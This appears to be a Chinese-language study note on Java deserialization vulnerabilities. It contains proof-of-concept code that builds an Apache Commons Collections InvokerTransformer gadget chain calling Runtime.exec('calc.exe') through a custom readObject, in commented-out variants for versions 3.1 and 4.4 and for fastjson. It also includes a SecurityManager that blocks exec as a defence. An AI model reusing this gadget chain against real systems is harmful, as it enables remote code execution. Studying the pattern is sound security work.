反序列化漏洞
package com.lcw.demo;
import java.io.*;
import java.util.HashMap;
import java.util.Map;
// 用到的commons.collections包
import com.alibaba.fastjson.JSON;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InvokerTransformer;
import org.apache.commons.collections4.map.TransformedMap;
/**
* 反序列化漏洞测试
*/
public class DeSerPoc {
public static void main(String args[]) throws Exception {
// 实例化对象
// SerObj serObj = new SerObj();
// serObj.name = "serobj";
//
// // 以下就是序列化操作
// // 打开object.ser文件
// FileOutputStream fos = new FileOutputStream("object.ser");
// ObjectOutputStream oos = new ObjectOutputStream(fos);
// // 使用writeObject()方法将serObj对象写到object.ser文件
// oos.writeObject(serObj);
// oos.close();
// fos.close();
// Thread.sleep(2000);
// FileInputStream fis = new FileInputStream("object.ser");
// ObjectInputStream ois = new ObjectInputStream(fis);
// // 使用从object.ser文件中读取对象
// SerObj deSerObj = (SerObj) ois.readObject();
// System.out.println(deSerObj.name);
// ois.close();
// fis.close();
//4.4
{
// Transformer[] transformers = new Transformer[]{
// new ConstantTransformer(Runtime.class),
// new InvokerTransformer("getMethod", new Class[]{
// String.class, Class[].class}, new Object[]{
// "getRuntime", new Class[0]}),
//
// new InvokerTransformer("invoke", new Class[]{
// Object.class, Object[].class}, new Object[]{
// null, new Object[0]}),
// new InvokerTransformer("exec", new Class[]{
// String.class}, new Object[]{"calc.exe"})
// };
//
// Transformer transformedChain = new ChainedTransformer(transformers);
// Map<String, String> beforeTransformerMap = new HashMap<String, String>();
// beforeTransformerMap.put("value", "value");
// Map afterTransformerMap = TransformedMap.transformedMap(beforeTransformerMap, null, transformedChain);
// // SerObjRewrite中的setValue能触发afterTransformerMap中的代码的执行
// SerObjRewrite serObj = new SerObjRewrite();
// serObj.map = afterTransformerMap;
// // 将对象写入到object.ser
// File f = new File("bin2");
//
// FileOutputStream fos = new FileOutputStream(f);
// ObjectOutputStream oos = new ObjectOutputStream(fos);
// oos.writeObject(serObj);
// oos.close();
//
// /*****/
// FileInputStream in;
// in = new FileInputStream("bin2");
// ObjectInputStream ins = new ObjectInputStream(in);
// ins.readObject();
}
//3.1
{
// Transformer[] transformers = new Transformer[]{
// new ConstantTransformer(Runtime.class),
// new InvokerTransformer("getMethod", new Class[]{
// String.class, Class[].class}, new Object[]{
// "getRuntime", new Class[0]}),
//
// new InvokerTransformer("invoke", new Class[]{
// Object.class, Object[].class}, new Object[]{
// null, new Object[0]}),
// new InvokerTransformer("exec", new Class[]{
// String.class}, new Object[]{"calc.exe"})
// };
//
// Transformer transformedChain = new ChainedTransformer(transformers);
// Map<String, String> beforeTransformerMap = new HashMap<String, String>();
// beforeTransformerMap.put("value", "value");
// Map afterTransformerMap = TransformedMap.decorate(beforeTransformerMap, null, transformedChain);
// // SerObjRewrite中的setValue能触发afterTransformerMap中的代码的执行
// SerObjRewrite serObj = new SerObjRewrite();
// serObj.map = afterTransformerMap;
// // 将对象写入到object.ser
// File f = new File("bin2");
//
// FileOutputStream fos = new FileOutputStream(f);
// ObjectOutputStream oos = new ObjectOutputStream(fos);
// oos.writeObject(serObj);
// oos.close();
//
// /*****/
// FileInputStream in;
// in = new FileInputStream("bin2");
// ObjectInputStream ins = new ObjectInputStream(in);
// ins.readObject();
}
{
// Transformer[] transformers = new Transformer[]{
// new ConstantTransformer(Runtime.class),
// new InvokerTransformer("getMethod", new Class[]{
// String.class, Class[].class}, new Object[]{
// "getRuntime", new Class[0]}),
//
// new InvokerTransformer("invoke", new Class[]{
// Object.class, Object[].class}, new Object[]{
// null, new Object[0]}),
// new InvokerTransformer("exec", new Class[]{
// String.class}, new Object[]{"calc.exe"})
// };
//
// Transformer transformedChain = new ChainedTransformer(transformers);
// Map<String, String> beforeTransformerMap = new HashMap<String, String>();
// beforeTransformerMap.put("value", "value");
// Map afterTransformerMap = TransformedMap.decorate(beforeTransformerMap, null, transformedChain);
// // SerObjRewrite中的setValue能触发afterTransformerMap中的代码的执行
// SerObjRewrite serObj = new SerObjRewrite();
// serObj.map = afterTransformerMap;
// String s= JSON.toJSONString(serObj);
// Object o = JSON.parseObject(s);
// String a = s;
}
}
}
class SerObj implements Serializable {
public String name;
}
// 重写SerObj类,其实也不叫重写就随便新实现一个序例化类,重写序列化类的readObject方法,该方法在反序列化时会被自动调用
// 在readObject中调用setValue,setValue能触发注入代码的调用,这正是代码注入的关键
class SerObjRewrite implements Serializable {
// name可有可无,又不是真重写
public String name;
public Map map;
private void readObject(java.io.ObjectInputStream in) throws ClassNotFoundException, IOException {
in.defaultReadObject();
if (map != null) {
Map.Entry e = (Map.Entry) map.entrySet().iterator().next();
e.setValue("400m");
}
}
}
测试类
package com.lcw.demo;
import java.security.Permission;
/**
* 反序列化漏洞
*/
public class TestSerialize {
public static void main(String[] args) {
TestSerialize testSerialize = new TestSerialize();
testSerialize.test();
}
private void test() {
SecurityManager originalSecurityManager = System.getSecurityManager();
if (originalSecurityManager == null) {
// 创建自己的SecurityManager
SecurityManager sm = new SecurityManager() {
private void check(Permission perm) {
// 禁止exec
if (perm instanceof java.io.FilePermission) {
String actions = perm.getActions();
if (actions != null && actions.contains("execute")) {
throw new SecurityException("execute denied!");
}
}
// 禁止设置新的SecurityManager
if (perm instanceof java.lang.RuntimePermission) {
String name = perm.getName();
if (name != null && name.contains("setSecurityManager")) {
throw new SecurityException(
"System.setSecurityManager denied!");
}
}
}
@Override
public void checkPermission(Permission perm) {
check(perm);
}
@Override
public void checkPermission(Permission perm, Object context) {
check(perm);
}
};
System.setSecurityManager(sm);
}
}
}
正式测试
package com.lcw.demo;
public class Test {
public static void main(String[] args) throws Exception {
TestSerialize.main(null);
DeSerPoc.main(null);
}
}